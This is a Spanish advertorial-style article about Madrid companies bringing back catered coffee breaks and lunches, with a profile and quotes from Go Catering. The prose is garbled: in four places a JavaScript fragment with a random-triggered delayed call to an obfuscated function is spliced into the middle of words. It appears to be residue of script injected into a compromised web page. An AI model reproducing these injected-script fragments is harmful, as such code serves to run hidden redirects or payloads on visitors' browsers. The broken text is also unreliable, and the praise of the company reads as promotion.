“Coffee break or Lunch” para las empresas españolas

1goctNo se trata de nada nuevo pero sí de algo que, con la crisis que aún perdura y que comenzó en el año 2008, había disminuido en cantidad y calidad en nuestro país. Las empresas comenzaron a ejecutar serios recortes, no solo en el personal, sino también en sus presupuestos para marketing y comunicación.

Fue el año pasado, en el 2015, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando la balanza de pagos indicaba que los números en nuestro país habían cambiado. España se colocaba al fin en positivo y pasábamos a ganar confianza frente a otros países. Estas cifras consiguieron que la economía española se animara dentro del propio Estado. Las empresas comenzaron a respirar un poco de oxígeno y, de paso, los directivos y empleados.

2goctEn resumidas cuentas, desde hace un año hemos podido observar esta nueva subida en los presupuestos, especialmente en Madrid, donde confluyen importantes núcleos empresariales. De nuevo, las grandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andes empresas apuestan por el “Coffee break” o bien por el “Lunch” dentro del orden del día en sus negocios.

Y aunque las cosas parecen haber mejorado un poco, sí es cierto que todavía no podemos hablar de recuperación. Este es el motivo por el que algunos catering han decidido reformular su oferta gastronómica para las empresas.  Ahora, aunque el formato es el mismo, se trata de ajustar el presupuesto sin prescindir de la calidad. ¿Cómo es posible hacer esto?

10goctPara responder a esta pregunta hemos hablado con una de las empresas de catering que están realizandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando este trabajo de reformulación en la oferta para empresas, Go Catering. Desde la dirección comercial, Rubén Guerra nos dice que “todos hemos tenido que realizar un esfuerzo, incluido los proveedores de alimentación y bebidas“. Y continúa: “la situación por la que hemos pasado en el sector no ha sido fácil, hemos visto como muchas empresas de catering han desaparecido, por lo que pienso que lo peor ha pasado ya. Pero nosotros hemos tenido siempre muy claro que la calidad hay que mantenerla, y para hacer eso no nos queda más remedio que concienciar a todos los que formamos parte de esta cadena“.

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De esta forma, Go Catering ofrece distintas alternativas a las empresas en Madrid y, de esta manera, se han convertido en uno de esos supervivientes en esta crisis llevándose de calle gran parte de los eventos que se celebran en esta ciudad. Trabajan bien y rápido, ofrecen un exquisito servicio y la materia prima no baja del nivel de calidad que exigen para sus clientes. A todo esto hay que añadir la continua innovación que realizan para ofrecer una propuesta creativa, rica en aromas y sabores. Así, ya no resulta tan caro ofrecer un “coffee break” o un “lunch” a los clientes o personal de su empresa.

Bien podemos decir que, cuandom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}ando hay voluntad, es fácil que el mundo funcione.

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